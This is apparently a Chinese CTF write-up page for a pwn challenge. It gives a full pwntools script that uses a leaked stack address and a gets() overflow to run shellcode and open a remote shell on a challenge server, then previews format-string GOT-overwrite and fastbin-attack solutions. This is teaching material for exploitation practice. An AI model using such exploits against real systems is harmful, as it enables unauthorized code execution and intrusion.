1000x_ 2026-06-08 10:43:12 21 0 返回题目详情
分析echo()
程序泄露了栈地址,并且调用了gets(),由于程序开启了PIE(NX未开),可以利用栈溢出漏洞往栈上写shellcode,然后跳转到栈执行
Exploit:
from pwn import *
ip = "49.232.142.230"
port = 17312
p = remote(ip, port)
p.recvuntil(b"journey ")
leak = p.recv(10)
offset = 302
shellcode = asm(shellcraft.sh())
payload = shellcode + b"a"*(offset - len(shellcode)) + p32(int(leak, 16))
p.send(payload)
p.interactive()
1.用file查看文件类型:64位ELFnostripped2.checksec查看文件开启保护:GOT可劫持非PIE3.IDA分析文件:prinf格式化漏洞4.分析代码,程序调用了system,printf之后调用了free。查看freegot表的内容为0x401036与systemplt的地址0x401060就差最后一个字节。那么想法修改freegot的内容为system的plt。而free的...
这题如题面所说分为三个部分,难度不高,第一部分考栈溢出,第二部分有点简单的逆向,第三部分考了一点fastbinattack,作为复习基础知识刚刚好拿到程序,首先做些基本检查:PartialRELRO,有Canary和NX,没有PIE。提供了libc(2.23)。got表里函数挺多,特别是看到了malloc和free,可能要用到堆。全局变量和main基本都保留了符号表,其他函数大多没有。第一部分直接...
***收费WriteUP请购买后查看,VIP用户可免费查看***
***收费WriteUP请购买后查看,VIP用户可免费查看***
***收费WriteUP请购买后查看,VIP用户可免费查看***